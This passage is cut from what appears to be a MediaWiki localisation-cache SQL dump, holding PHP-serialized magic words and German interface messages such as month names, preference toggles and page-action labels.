1;i:1;s:4:\"ohne\";i:2;s:4:\"none\";}s:10:\"img_center\";a:4:{i:0;i:1;i:1;s:9:\"zentriert\";i:2;s:6:\"center\";i:3;s:6:\"centre\";}s:10:\"img_framed\";a:5:{i:0;i:1;i:1;s:7:\"gerahmt\";i:2;s:6:\"framed\";i:3;s:8:\"enframed\";i:4;s:5:\"frame\";}s:13:\"img_frameless\";a:3:{i:0;i:1;i:1;s:9:\"rahmenlos\";i:2;s:9:\"frameless\";}s:8:\"img_lang\";a:3:{i:0;i:1;i:1;s:10:\"sprache=$1\";i:2;s:7:\"lang=$1\";}s:8:\"img_page\";a:5:{i:0;i:1;i:1;s:8:\"seite=$1\";i:2;s:8:\"seite_$1\";i:3;s:7:\"page=$1\";i:4;s:7:\"page $1\";}s:11:\"img_upright\";a:7:{i:0;i:1;i:1;s:8:\"hochkant\";i:2;s:11:\"hochkant=$1\";i:3;s:11:\"hochkant_$1\";i:4;s:7:\"upright\";i:5;s:10:\"upright=$1\";i:6;s:10:\"upright $1\";}s:10:\"img_border\";a:3:{i:0;i:1;i:1;s:4:\"rand\";i:2;s:6:\"border\";}s:12:\"img_baseline\";a:3:{i:0;i:1;i:1;s:10:\"grundlinie\";i:2;s:8:\"baseline\";}s:7:\"img_sub\";a:4:{i:0;i:1;i:1;s:12:\"tiefgestellt\";i:2;s:4:\"tief\";i:3;s:3:\"sub\";}s:9:\"img_super\";a:5:{i:0;i:1;i:1;s:12:\"hochgestellt\";i:2;s:4:\"hoch\";i:3;s:5:\"super\";i:4;s:3:\"sup\";}s:7:\"img_top\";a:3:{i:0;i:1;i:1;s:4:\"oben\";i:2;s:3:\"top\";}s:12:\"img_text_top\";a:3:{i:0;i:1;i:1;s:9:\"text-oben\";i:2;s:8:\"text-top\";}s:10:\"img_middle\";a:3:{i:0;i:1;i:1;s:5:\"mitte\";i:2;s:6:\"middle\";}s:10:\"img_bottom\";a:3:{i:0;i:1;i:1;s:5:\"unten\";i:2;s:6:\"bottom\";}s:15:\"img_text_bottom\";a:3:{i:0;i:1;i:1;s:10:\"text-unten\";i:2;s:11:\"text-bottom\";}s:8:\"img_link\";a:3:{i:0;i:1;i:1;s:10:\"verweis=$1\";i:2;s:7:\"link=$1\";}s:7:\"img_alt\";a:3:{i:0;i:1;i:1;s:17:\"alternativtext=$1\";i:2;s:6:\"alt=$1\";}s:9:\"img_class\";a:3:{i:0;i:1;i:1;s:9:\"klasse=$1\";i:2;s:8:\"class=$1\";}s:3:\"int\";a:3:{i:0;i:0;i:1;s:10:\"NACHRICHT:\";i:2;s:4:\"INT:\";}s:8:\"sitename\";a:3:{i:0;i:1;i:1;s:11:\"PROJEKTNAME\";i:2;s:8:\"SITENAME\";}s:2:\"ns\";a:3:{i:0;i:0;i:1;s:3:\"NR:\";i:2;s:3:\"NS:\";}s:3:\"nse\";a:3:{i:0;i:0;i:1;s:7:\"NR_URL:\";i:2;s:4:\"NSE:\";}s:8:\"localurl\";a:3:{i:0;i:0;i:1;s:11:\"LOKALE_URL:\";i:2;s:9:\"LOCALURL:\";}s:9:\"localurle\";a:3:{i:0;i:0;i:1;s:13:\"LOKALE_URL_C:\";i:2;s:10:\"LOCALURLE:\";}s:11:\"articlepath\";a:3:{i:0;i:0;i:1;s:11:\"ARTIKELPFAD\";i:2;s:11:\"ARTICLEPATH\";}s:6:\"pageid\";a:4:{i:0;i:0;i:1;s:8:\"SEITENID\";i:2;s:13:\"SEITENKENNUNG\";i:3;s:6:\"PAGEID\";}s:10:\"scriptpath\";a:3:{i:0;i:0;i:1;s:10:\"SKRIPTPFAD\";i:2;s:10:\"SCRIPTPATH\";}s:9:\"stylepath\";a:4:{i:0;i:0;i:1;s:8:\"STILPFAD\";i:2;s:9:\"STYLEPFAD\";i:3;s:9:\"STYLEPATH\";}s:7:\"grammar\";a:3:{i:0;i:0;i:1;s:10:\"GRAMMATIK:\";i:2;s:8:\"GRAMMAR:\";}s:6:\"gender\";a:3:{i:0;i:0;i:1;s:11:\"GESCHLECHT:\";i:2;s:7:\"GENDER:\";}s:14:\"notitleconvert\";a:4:{i:0;i:0;i:1;s:28:\"__KEINE_TITELKONVERTIERUNG__\";i:2;s:18:\"__NOTITLECONVERT__\";i:3;s:8:\"__NOTC__\";}s:16:\"nocontentconvert\";a:4:{i:0;i:0;i:1;s:30:\"__KEINE_INHALTSKONVERTIERUNG__\";i:2;s:20:\"__NOCONTENTCONVERT__\";i:3;s:8:\"__NOCC__\";}s:11:\"currentweek\";a:4:{i:0;i:1;i:1;s:21:\"JETZIGE_KALENDERWOCHE\";i:2;s:13:\"JETZIGE_WOCHE\";i:3;s:11:\"CURRENTWEEK\";}s:10:\"currentdow\";a:3:{i:0;i:1;i:1;s:23:\"JETZIGER_WOCHENTAG_ZAHL\";i:2;s:10:\"CURRENTDOW\";}s:9:\"localweek\";a:4:{i:0;i:1;i:1;s:20:\"LOKALE_KALENDERWOCHE\";i:2;s:12:\"LOKALE_WOCHE\";i:3;s:9:\"LOCALWEEK\";}s:8:\"localdow\";a:3:{i:0;i:1;i:1;s:22:\"LOKALER_WOCHENTAG_ZAHL\";i:2;s:8:\"LOCALDOW\";}s:10:\"revisionid\";a:4:{i:0;i:1;i:1;s:11:\"REVISIONSID\";i:2;s:10:\"VERSIONSID\";i:3;s:10:\"REVISIONID\";}s:11:\"revisionday\";a:4:{i:0;i:1;i:1;s:12:\"REVISIONSTAG\";i:2;s:11:\"VERSIONSTAG\";i:3;s:11:\"REVISIONDAY\";}s:12:\"revisionday2\";a:4:{i:0;i:1;i:1;s:13:\"REVISIONSTAG2\";i:2;s:12:\"VERSIONSTAG2\";i:3;s:12:\"REVISIONDAY2\";}s:13:\"revisionmonth\";a:4:{i:0;i:1;i:1;s:14:\"REVISIONSMONAT\";i:2;s:13:\"VERSIONSMONAT\";i:3;s:13:\"REVISIONMONTH\";}s:14:\"revisionmonth1\";a:4:{i:0;i:1;i:1;s:15:\"REVISIONSMONAT1\";i:2;s:14:\"VERSIONSMONAT1\";i:3;s:14:\"REVISIONMONTH1\";}s:12:\"revisionyear\";a:4:{i:0;i:1;i:1;s:13:\"REVISIONSJAHR\";i:2;s:12:\"VERSIONSJAHR\";i:3;s:12:\"REVISIONYEAR\";}s:17:\"revisiontimestamp\";a:4:{i:0;i:1;i:1;s:20:\"REVISIONSZEITSTEMPEL\";i:2;s:19:\"VERSIONSZEITSTEMPEL\";i:3;s:17:\"REVISIONTIMESTAMP\";}s:12:\"revisionuser\";a:4:{i:0;i:1;i:1;s:17:\"REVISIONSBENUTZER\";i:2;s:16:\"VERSIONSBENUTZER\";i:3;s:12:\"REVISIONUSER\";}s:12:\"revisionsize\";a:3:{i:0;i:1;i:1;s:15:\"VERSIONSGRÖSSE\";i:2;s:12:\"REVISIONSIZE\";}s:7:\"fullurl\";a:3:{i:0;i:0;i:1;s:18:\"VOLLSTÄNDIGE_URL:\";i:2;s:8:\"FULLURL:\";}s:8:\"fullurle\";a:3:{i:0;i:0;i:1;s:20:\"VOLLSTÄNDIGE_URL_C:\";i:2;s:9:\"FULLURLE:\";}s:12:\"canonicalurl\";a:3:{i:0;i:0;i:1;s:15:\"KANONISCHE_URL:\";i:2;s:13:\"CANONICALURL:\";}s:13:\"canonicalurle\";a:3:{i:0;i:0;i:1;s:17:\"KANONISCHE_URL_C:\";i:2;s:14:\"CANONICALURLE:\";}s:7:\"lcfirst\";a:3:{i:0;i:0;i:1;s:14:\"INITIAL_KLEIN:\";i:2;s:8:\"LCFIRST:\";}s:7:\"ucfirst\";a:3:{i:0;i:0;i:1;s:14:\"INITIAL_GROSS:\";i:2;s:8:\"UCFIRST:\";}s:2:\"lc\";a:3:{i:0;i:0;i:1;s:6:\"KLEIN:\";i:2;s:3:\"LC:\";}s:2:\"uc\";a:3:{i:0;i:0;i:1;s:6:\"GROSS:\";i:2;s:3:\"UC:\";}s:3:\"raw\";a:3:{i:0;i:0;i:1;s:4:\"ROH:\";i:2;s:4:\"RAW:\";}s:12:\"displaytitle\";a:3:{i:0;i:1;i:1;s:11:\"SEITENTITEL\";i:2;s:12:\"DISPLAYTITLE\";}s:14:\"newsectionlink\";a:4:{i:0;i:1;i:1;s:24:\"__NEUER_ABSCHNITTSLINK__\";i:2;s:13:\"__PLUS_LINK__\";i:3;s:18:\"__NEWSECTIONLINK__\";}s:16:\"nonewsectionlink\";a:4:{i:0;i:1;i:1;s:29:\"__KEIN_NEUER_ABSCHNITTSLINK__\";i:2;s:18:\"__KEIN_PLUS_LINK__\";i:3;s:20:\"__NONEWSECTIONLINK__\";}s:14:\"currentversion\";a:3:{i:0;i:1;i:1;s:15:\"JETZIGE_VERSION\";i:2;s:14:\"CURRENTVERSION\";}s:9:\"urlencode\";a:3:{i:0;i:0;i:1;s:13:\"URLENKODIERT:\";i:2;s:10:\"URLENCODE:\";}s:12:\"anchorencode\";a:4:{i:0;i:0;i:1;s:15:\"ANKERENKODIERT:\";i:2;s:21:\"SPRUNGMARKEENKODIERT:\";i:3;s:12:\"ANCHORENCODE\";}s:16:\"currenttimestamp\";a:3:{i:0;i:1;i:1;s:20:\"JETZIGER_ZEITSTEMPEL\";i:2;s:16:\"CURRENTTIMESTAMP\";}s:14:\"localtimestamp\";a:3:{i:0;i:1;i:1;s:19:\"LOKALER_ZEITSTEMPEL\";i:2;s:14:\"LOCALTIMESTAMP\";}s:13:\"directionmark\";a:4:{i:0;i:1;i:1;s:15:\"TEXTAUSRICHTUNG\";i:2;s:13:\"DIRECTIONMARK\";i:3;s:7:\"DIRMARK\";}s:8:\"language\";a:3:{i:0;i:0;i:1;s:9:\"#SPRACHE:\";i:2;s:10:\"#LANGUAGE:\";}s:15:\"contentlanguage\";a:4:{i:0;i:1;i:1;s:14:\"INHALTSSPRACHE\";i:2;s:15:\"CONTENTLANGUAGE\";i:3;s:11:\"CONTENTLANG\";}s:16:\"pagesinnamespace\";a:6:{i:0;i:1;i:1;s:21:\"SEITEN_IM_NAMENSRAUM:\";i:2;s:13:\"SEITEN_IN_NR:\";i:3;s:10:\"SEITEN_NR:\";i:4;s:17:\"PAGESINNAMESPACE:\";i:5;s:10:\"PAGESINNS:\";}s:14:\"numberofadmins\";a:3:{i:0;i:1;i:1;s:11:\"ADMINANZAHL\";i:2;s:14:\"NUMBEROFADMINS\";}s:9:\"formatnum\";a:3:{i:0;i:0;i:1;s:12:\"ZAHLENFORMAT\";i:2;s:9:\"FORMATNUM\";}s:7:\"padleft\";a:3:{i:0;i:0;i:1;s:12:\"FÜLLENLINKS\";i:2;s:7:\"PADLEFT\";}s:8:\"padright\";a:3:{i:0;i:0;i:1;s:13:\"FÜLLENRECHTS\";i:2;s:8:\"PADRIGHT\";}s:7:\"special\";a:3:{i:0;i:0;i:1;s:7:\"spezial\";i:2;s:7:\"special\";}s:8:\"speciale\";a:3:{i:0;i:0;i:1;s:8:\"speziale\";i:2;s:8:\"speciale\";}s:11:\"defaultsort\";a:5:{i:0;i:1;i:1;s:11:\"SORTIERUNG:\";i:2;s:12:\"DEFAULTSORT:\";i:3;s:15:\"DEFAULTSORTKEY:\";i:4;s:20:\"DEFAULTCATEGORYSORT:\";}s:8:\"filepath\";a:3:{i:0;i:0;i:1;s:10:\"DATEIPFAD:\";i:2;s:9:\"FILEPATH:\";}s:3:\"tag\";a:3:{i:0;i:0;i:1;s:11:\"erweiterung\";i:2;s:3:\"tag\";}s:9:\"hiddencat\";a:4:{i:0;i:1;i:1;s:24:\"__VERSTECKTE_KATEGORIE__\";i:2;s:21:\"__WARTUNGSKATEGORIE__\";i:3;s:13:\"__HIDDENCAT__\";}s:15:\"pagesincategory\";a:6:{i:0;i:1;i:1;s:19:\"SEITEN_IN_KATEGORIE\";i:2;s:10:\"SEITEN_KAT\";i:3;s:11:\"SEITENINKAT\";i:4;s:15:\"PAGESINCATEGORY\";i:5;s:10:\"PAGESINCAT\";}s:8:\"pagesize\";a:3:{i:0;i:1;i:1;s:13:\"SEITENGRÖSSE\";i:2;s:8:\"PAGESIZE\";}s:5:\"index\";a:4:{i:0;i:1;i:1;s:14:\"__INDEXIEREN__\";i:2;s:14:\"__INDIZIEREN__\";i:3;s:9:\"__INDEX__\";}s:7:\"noindex\";a:5:{i:0;i:1;i:1;s:20:\"__NICHT_INDEXIEREN__\";i:2;s:14:\"__KEIN_INDEX__\";i:3;s:20:\"__NICHT_INDIZIEREN__\";i:4;s:11:\"__NOINDEX__\";}s:13:\"numberingroup\";a:4:{i:0;i:1;i:1;s:18:\"BENUTZER_IN_GRUPPE\";i:2;s:13:\"NUMBERINGROUP\";i:3;s:10:\"NUMINGROUP\";}s:14:\"staticredirect\";a:3:{i:0;i:1;i:1;s:28:\"__PERMANENTE_WEITERLEITUNG__\";i:2;s:18:\"__STATICREDIRECT__\";}s:15:\"protectionlevel\";a:3:{i:0;i:1;i:1;s:12:\"SCHUTZSTATUS\";i:2;s:15:\"PROTECTIONLEVEL\";}s:10:\"formatdate\";a:4:{i:0;i:0;i:1;s:12:\"DATUMSFORMAT\";i:2;s:10:\"formatdate\";i:3;s:10:\"dateformat\";}s:8:\"url_path\";a:3:{i:0;i:0;i:1;s:4:\"PFAD\";i:2;s:4:\"PATH\";}s:9:\"url_query\";a:3:{i:0;i:0;i:1;s:7:\"ABFRAGE\";i:2;s:5:\"QUERY\";}s:19:\"defaultsort_noerror\";a:3:{i:0;i:0;i:1;s:10:\"keinfehler\";i:2;s:7:\"noerror\";}s:21:\"defaultsort_noreplace\";a:3:{i:0;i:0;i:1;s:14:\"keineersetzung\";i:2;s:9:\"noreplace\";}s:19:\"pagesincategory_all\";a:3:{i:0;i:0;i:1;s:4:\"alle\";i:2;s:3:\"all\";}s:21:\"pagesincategory_pages\";a:3:{i:0;i:0;i:1;s:6:\"seiten\";i:2;s:5:\"pages\";}s:23:\"pagesincategory_subcats\";a:4:{i:0;i:0;i:1;s:15:\"unterkategorien\";i:2;s:9:\"unterkats\";i:3;s:7:\"subcats\";}s:21:\"pagesincategory_files\";a:3:{i:0;i:0;i:1;s:7:\"dateien\";i:2;s:5:\"files\";}s:1:\"!\";a:2:{i:0;i:1;i:1;s:1:\"!\";}s:3:\"msg\";a:2:{i:0;i:0;i:1;s:4:\"MSG:\";}s:5:\"msgnw\";a:2:{i:0;i:0;i:1;s:6:\"MSGNW:\";}s:9:\"img_width\";a:2:{i:0;i:1;i:1;s:4:\"$1px\";}s:6:\"server\";a:2:{i:0;i:0;i:1;s:6:\"SERVER\";}s:10:\"servername\";a:2:{i:0;i:0;i:1;s:10:\"SERVERNAME\";}s:6:\"plural\";a:2:{i:0;i:0;i:1;s:7:\"PLURAL:\";}s:9:\"rawsuffix\";a:2:{i:0;i:1;i:1;s:1:\"R\";}s:15:\"nocommafysuffix\";a:2:{i:0;i:0;i:1;s:5:\"NOSEP\";}s:16:\"cascadingsources\";a:2:{i:0;i:1;i:1;s:16:\"CASCADINGSOURCES\";}s:8:\"url_wiki\";a:2:{i:0;i:0;i:1;s:4:\"WIKI\";}s:20:\"displaytitle_noerror\";a:2:{i:0;i:0;i:1;s:7:\"noerror\";}s:22:\"displaytitle_noreplace\";a:2:{i:0;i:0;i:1;s:9:\"noreplace\";}}'),('de','messages:tog-underline','s:21:\"Links unterstreichen:\";'),('de','messages:tog-hideminor','s:62:\"Kleine Änderungen in den „Letzten Änderungen“ ausblenden\";'),('de','messages:tog-hidepatrolled','s:69:\"Kontrollierte Änderungen in den „Letzten Änderungen“ ausblenden\";'),('de','messages:tog-newpageshidepatrolled','s:58:\"Kontrollierte Seiten bei den „Neuen Seiten“ ausblenden\";'),('de','messages:tog-extendwatchlist','s:92:\"Beobachtungsliste erweitern, um statt nur der letzten Änderung alle Änderungen anzuzeigen.\";'),('de','messages:tog-usenewrc','s:88:\"Änderungen auf „Letzte Änderungen“ und der Beobachtungsliste nach Seite gruppieren\";'),('de','messages:tog-numberheadings','s:38:\"Überschriften automatisch nummerieren\";'),('de','messages:tog-showtoolbar','s:34:\"Bearbeiten-Werkzeugleiste anzeigen\";'),('de','messages:tog-editondblclick','s:33:\"Seiten mit Doppelklick bearbeiten\";'),('de','messages:tog-editsectiononrightclick','s:46:\"Einzelne Abschnitte per Rechtsklick bearbeiten\";'),('de','messages:tog-watchcreations','s:71:\"Selbst erstellte Seiten und hochgeladene Dateien automatisch beobachten\";'),('de','messages:tog-watchdefault','s:59:\"Selbst geänderte Seiten und Dateien automatisch beobachten\";'),('de','messages:tog-watchmoves','s:60:\"Selbst verschobene Seiten und Dateien automatisch beobachten\";'),('de','messages:tog-watchdeletion','s:59:\"Selbst gelöschte Seiten und Dateien automatisch beobachten\";'),('de','messages:tog-watchrollback','s:96:\"Seiten, bei denen ich eine Zurücksetzung durchgeführt habe, der Beobachtungsliste hinzufügen.\";'),('de','messages:tog-minordefault','s:61:\"Eigene Änderungen standardmäßig als geringfügig markieren\";'),('de','messages:tog-previewontop','s:51:\"Vorschau oberhalb des Bearbeitungsfensters anzeigen\";'),('de','messages:tog-previewonfirst','s:50:\"Beim ersten Bearbeiten immer die Vorschau anzeigen\";'),('de','messages:tog-enotifwatchlistpages','s:66:\"Bei Änderungen an beobachteten Seiten oder Dateien E-Mails senden\";'),('de','messages:tog-enotifusertalkpages','s:66:\"Bei Änderungen an meiner Benutzer-Diskussionsseite E-Mails senden\";'),('de','messages:tog-enotifminoredits','s:65:\"Auch bei kleinen Änderungen an Seiten und Dateien E-Mails senden\";'),('de','messages:tog-enotifrevealaddr','s:58:\"Meine E-Mail-Adresse in Benachrichtigungs-E-Mails anzeigen\";'),('de','messages:tog-shownumberswatching','s:42:\"Anzahl der beobachtenden Benutzer anzeigen\";'),('de','messages:tog-oldsig','s:20:\"Vorhandene Signatur:\";'),('de','messages:tog-fancysig','s:62:\"Signatur als Wikitext behandeln (ohne automatische Verlinkung)\";'),('de','messages:tog-uselivepreview','s:40:\"Vorschau sofort anzeigen (experimentell)\";'),('de','messages:tog-forceeditsummary','s:55:\"Warnen, sofern beim Speichern die Zusammenfassung fehlt\";'),('de','messages:tog-watchlisthideown','s:56:\"Eigene Bearbeitungen in der Beobachtungsliste ausblenden\";'),('de','messages:tog-watchlisthidebots','s:60:\"Bearbeitungen durch Bots in der Beobachtungsliste ausblenden\";'),('de','messages:tog-watchlisthideminor','s:56:\"Kleine Bearbeitungen in der Beobachtungsliste ausblenden\";'),('de','messages:tog-watchlisthideliu','s:71:\"Bearbeitungen angemeldeter Benutzer in der Beobachtungsliste ausblenden\";'),('de','messages:tog-watchlisthideanons','s:81:\"Bearbeitungen anonymer Benutzer (IP-Adressen) in der Beobachtungsliste ausblenden\";'),('de','messages:tog-watchlisthidepatrolled','s:61:\"Kontrollierte Änderungen in der Beobachtungsliste ausblenden\";'),('de','messages:tog-ccmeonemails','s:63:\"Schicke mir Kopien der E-Mails, die ich anderen Benutzern sende\";'),('de','messages:tog-diffonly','s:86:\"Beim Versionsvergleich nur die Unterschiede und nicht die vollständige Seite anzeigen\";'),('de','messages:tog-showhiddencats','s:30:\"Anzeige versteckter Kategorien\";'),('de','messages:tog-norollbackdiff','s:48:\"Unterschied nach dem Zurücksetzen unterdrücken\";'),('de','messages:tog-useeditwarning','s:112:\"Warnen, sofern eine zur Bearbeitung geöffnete Seite verlassen wird, die nicht gespeicherte Änderungen enthält\";'),('de','messages:tog-prefershttps','s:56:\"Wenn angemeldet, immer eine sichere Verbindung benutzen.\";'),('de','messages:underline-always','s:5:\"immer\";'),('de','messages:underline-never','s:3:\"nie\";'),('de','messages:underline-default','s:61:\"abhängig von der Benutzeroberfläche oder Browsereinstellung\";'),('de','messages:editfont-style','s:48:\"Schriftart für den Text im Bearbeitungsfenster:\";'),('de','messages:editfont-default','s:15:\"Browserstandard\";'),('de','messages:editfont-monospace','s:32:\"Schrift mit fester Zeichenbreite\";'),('de','messages:editfont-sansserif','s:26:\"Serifenlose Groteskschrift\";'),('de','messages:editfont-serif','s:19:\"Schrift mit Serifen\";'),('de','messages:sunday','s:7:\"Sonntag\";'),('de','messages:monday','s:6:\"Montag\";'),('de','messages:tuesday','s:8:\"Dienstag\";'),('de','messages:wednesday','s:8:\"Mittwoch\";'),('de','messages:thursday','s:10:\"Donnerstag\";'),('de','messages:friday','s:7:\"Freitag\";'),('de','messages:saturday','s:7:\"Samstag\";'),('de','messages:sun','s:2:\"So\";'),('de','messages:mon','s:2:\"Mo\";'),('de','messages:tue','s:2:\"Di\";'),('de','messages:wed','s:2:\"Mi\";'),('de','messages:thu','s:2:\"Do\";'),('de','messages:fri','s:2:\"Fr\";'),('de','messages:sat','s:2:\"Sa\";'),('de','messages:january','s:6:\"Januar\";'),('de','messages:february','s:7:\"Februar\";'),('de','messages:march','s:5:\"März\";'),('de','messages:april','s:5:\"April\";'),('de','messages:may_long','s:3:\"Mai\";'),('de','messages:june','s:4:\"Juni\";'),('de','messages:july','s:4:\"Juli\";'),('de','messages:august','s:6:\"August\";'),('de','messages:september','s:9:\"September\";'),('de','messages:october','s:7:\"Oktober\";'),('de','messages:november','s:8:\"November\";'),('de','messages:december','s:8:\"Dezember\";'),('de','messages:january-gen','s:7:\"Januars\";'),('de','messages:february-gen','s:8:\"Februars\";'),('de','messages:march-gen','s:7:\"Märzes\";'),('de','messages:april-gen','s:6:\"Aprils\";'),('de','messages:may-gen','s:4:\"Mais\";'),('de','messages:june-gen','s:5:\"Junis\";'),('de','messages:july-gen','s:5:\"Julis\";'),('de','messages:august-gen','s:7:\"Augusts\";'),('de','messages:september-gen','s:10:\"Septembers\";'),('de','messages:october-gen','s:8:\"Oktobers\";'),('de','messages:november-gen','s:9:\"Novembers\";'),('de','messages:december-gen','s:9:\"Dezembers\";'),('de','messages:jan','s:4:\"Jan.\";'),('de','messages:feb','s:4:\"Feb.\";'),('de','messages:mar','s:5:\"Mär.\";'),('de','messages:apr','s:4:\"Apr.\";'),('de','messages:may','s:3:\"Mai\";'),('de','messages:jun','s:4:\"Jun.\";'),('de','messages:jul','s:4:\"Jul.\";'),('de','messages:aug','s:4:\"Aug.\";'),('de','messages:sep','s:4:\"Sep.\";'),('de','messages:oct','s:4:\"Okt.\";'),('de','messages:nov','s:4:\"Nov.\";'),('de','messages:dec','s:4:\"Dez.\";'),('de','messages:january-date','s:10:\"$1. Januar\";'),('de','messages:february-date','s:11:\"$1. Februar\";'),('de','messages:march-date','s:9:\"$1. März\";'),('de','messages:april-date','s:9:\"$1. April\";'),('de','messages:may-date','s:7:\"$1. Mai\";'),('de','messages:june-date','s:8:\"$1. Juni\";'),('de','messages:july-date','s:8:\"$1. Juli\";'),('de','messages:august-date','s:10:\"$1. August\";'),('de','messages:september-date','s:13:\"$1. September\";'),('de','messages:october-date','s:11:\"$1. Oktober\";'),('de','messages:november-date','s:12:\"$1. November\";'),('de','messages:december-date','s:12:\"$1. Dezember\";'),('de','messages:pagecategories','s:34:\"{{PLURAL:$1|Kategorie|Kategorien}}\";'),('de','messages:category_header','s:32:\"Seiten in der Kategorie „$1“\";'),('de','messages:subcategories','s:15:\"Unterkategorien\";'),('de','messages:category-media-header','s:32:\"Medien in der Kategorie „$1“\";'),('de','messages:category-empty','s:62:\"\'\'Diese Kategorie enthält zurzeit keine Seiten oder Medien.\'\'\";'),('de','messages:hidden-categories','s:56:\"{{PLURAL:$1|Versteckte Kategorie|Versteckte Kategorien}}\";'),('de','messages:hidden-category-category','s:21:\"Versteckte Kategorien\";'),('de','messages:category-subcat-count','s:241:\"{{PLURAL:$2|Diese Kategorie enthält folgende Unterkategorie:|{{PLURAL:$1|Folgende Unterkategorie ist eine von insgesamt $2 Unterkategorien in dieser Kategorie:|Es werden $1 von insgesamt $2 Unterkategorien in dieser Kategorie angezeigt:}}}}\";'),('de','messages:category-subcat-count-limited','s:82:\"Diese Kategorie enthält folgende {{PLURAL:$1|Unterkategorie|$1 Unterkategorien}}:\";'),('de','messages:category-article-count','s:205:\"{{PLURAL:$2|Diese Kategorie enthält folgende Seite:|{{PLURAL:$1|Folgende Seite ist eine von insgesamt $2 Seiten in dieser Kategorie:|Es werden $1 von insgesamt $2 Seiten in dieser Kategorie angezeigt:}}}}\";'),('de','messages:category-article-count-limited','s:78:\"Folgende {{PLURAL:$1|Seite ist|$1 Seiten sind}} in dieser Kategorie enthalten:\";'),('de','messages:category-file-count','s:207:\"{{PLURAL:$2|Diese Kategorie enthält folgende Datei:|{{PLURAL:$1|Folgende Datei ist eine von insgesamt $2 Dateien in dieser Kategorie:|Es werden $1 von insgesamt $2 Dateien in dieser Kategorie angezeigt:}}}}\";'),('de','messages:category-file-count-limited','s:79:\"Folgende {{PLURAL:$1|Datei ist|$1 Dateien sind}} in dieser Kategorie enthalten:\";'),('de','messages:listingcontinuesabbrev','s:13:\"(Fortsetzung)\";'),('de','messages:index-category','s:17:\"Indexierte Seiten\";'),('de','messages:noindex-category','s:22:\"Nichtindexierte Seiten\";'),('de','messages:broken-file-category','s:30:\"Seiten mit defekten Dateilinks\";'),('de','messages:about','s:5:\"Über\";'),('de','messages:article','s:5:\"Seite\";'),('de','messages:newwindow','s:39:\"(wird in einem neuen Fenster geöffnet)\";'),('de','messages:cancel','s:9:\"Abbrechen\";'),('de','messages:moredotdotdot','s:8:\"Mehr …\";'),('de','messages:morenotlisted','s:35:\"Diese Liste ist nicht vollständig.\";'),('de','messages:mypage','s:12:\"Eigene Seite\";'),('de','messages:mytalk','s:10:\"Diskussion\";'),('de','messages:anontalk','s:26:\"Diskussionsseite dieser IP\";'),('de','messages:navigation','s:10:\"Navigation\";'),('de','messages:and','s:8:\" und\";'),('de','messages:qbfind','s:6:\"Finden\";'),('de','messages:qbbrowse','s:11:\"Durchsuchen\";'),('de','messages:qbedit','s:10:\"Bearbeiten\";'),('de','messages:qbpageoptions','s:14:\"Seitenoptionen\";'),('de','messages:qbmyoptions','s:12:\"Meine Seiten\";'),('de','messages:faq','s:24:\"Häufig gestellte Fragen\";'),('de','messages:faqpage','s:11:\"Project:FAQ\";'),('de','messages:actions','s:8:\"Aktionen\";'),('de','messages:namespaces','s:12:\"Namensräume\";'),('de','messages:variants','s:9:\"Varianten\";'),('de','messages:navigation-heading','s:16:\"Navigationsmenü\";'),('de','messages:errorpagetitle','s:6:\"Fehler\";'),('de','messages:returnto','s:21:\"Zurück zur Seite $1.\";'),('de','messages:tagline','s:16:\"Aus {{SITENAME}}\";'),('de','messages:help','s:5:\"Hilfe\";'),('de','messages:search','s:5:\"Suche\";'),('de','messages:searchbutton','s:6:\"Suchen\";'),('de','messages:go','s:10:\"Ausführen\";'),('de','messages:searcharticle','s:5:\"Seite\";'),('de','messages:history','s:9:\"Versionen\";'),('de','messages:history_short','s:18:\"Versionsgeschichte\";'),('de','messages:updatedmarker','s:36:\"Änderung seit deinem letzten Besuch\";'),('de','messages:printableversion','s:12:\"Druckversion\";'),('de','messages:permalink','s:16:\"Permanenter Link\";'),('de','messages:print','s:7:\"Drucken\";'),('de','messages:view','s:5:\"Lesen\";'),('de','messages:view-foreign','s:14:\"Auf $1 ansehen\";'),('de','messages:edit','s:10:\"Bearbeiten\";'),('de','messages:edit-local','s:30:\"Lokale Beschreibung bearbeiten\";'),('de','messages:create','s:9:\"Erstellen\";'),('de','messages:create-local','s:31:\"Lokale Beschreibung hinzufügen\";'),('de','messages:editthispage','s:16:\"Seite bearbeiten\";'),('de','messages:create-this-page','s:15:\"Seite erstellen\";'),('de','messages:delete','s:8:\"Löschen\";'),('de','messages:deletethispage','s:20:\"Diese Seite löschen\";'),('de','messages:undeletethispage','s:28:\"Diese Seite wiederherstellen\";'),('de','messages:undelete_short','s:53:\"{{PLURAL:$1|1 Version|$1 Versionen}} wiederherstellen\";'),('de','messages:viewdeleted_short','s:69:\"{{PLURAL:$1|Eine gelöschte Version|$1 gelöschte Versionen}} ansehen\";'),('de','messages:protect','s:9:\"Schützen\";'),('de','messages:protect_change','s:7:\"ändern\";'),('de','messages:protectthispage','s:15:\"Seite schützen\";'),('de','messages:unprotect','s:20:\"Seitenschutz ändern\";'),('de','messages:unprotectthispage','s:20:\"Seitenschutz ändern\";'),('de','messages:newpage','s:10:\"Neue Seite\";'),('de','messages:talkpage','s:23:\"Diese Seite diskutieren\";'),('de','messages:talkpagelinktext','s:10:\"Diskussion\";'),('de','messages:specialpage','s:12:\"Spezialseite\";'),('de','messages:personaltools','s:15:\"Meine Werkzeuge\";'),('de','messages:articlepage','s:21:\"Inhaltsseite anzeigen\";'),('de','messages:talk','s:10:\"Diskussion\";'),('de','messages:views','s:9:\"Ansichten\";'),('de','messages:toolbox','s:9:\"Werkzeuge\";'),('de','messages:userpage','s:22:\"Benutzerseite anzeigen\";'),('de','messages:projectpage','s:21:\"Projektseite anzeigen\";'),('de','messages:imagepage','s:19:\"Dateiseite anzeigen\";'),('de','messages:mediawikipage','s:22:\"Meldungsseite anzeigen\";'),('de','messages:templatepage','s:22:\"Vorlagenseite anzeigen\";'),('de','messages:viewhelppage','s:19:\"Hilfeseite anzeigen\";'),('de','messages:categorypage','s:23:\"Kategorieseite anzeigen\";'),('de','messages:viewtalkpage','s:10:\"Diskussion\";'),('de','messages:otherlanguages','s:19:\"In anderen Sprachen\";'),('de','messages:redirectedfrom','s:23:\"(Weitergeleitet von $1)\";'),('de','messages:redirectpagesub','s:13:\"Weiterleitung\";'),('de','messages:redirectto','s:19:\"Weiterleitung nach:\";'),('de','messages:lastmodifiedat','s:52:\"Diese Seite wurde zuletzt am $1 um $2 Uhr geändert.\";'),('de','messages:viewcount','s:63:\"Diese Seite wurde bisher {{PLURAL:$1|einmal|$1 mal}} abgerufen.\";'),('de','messages:protectedpage','s:17:\"Geschützte Seite\";'),('de','messages:jumpto','s:12:\"Wechseln 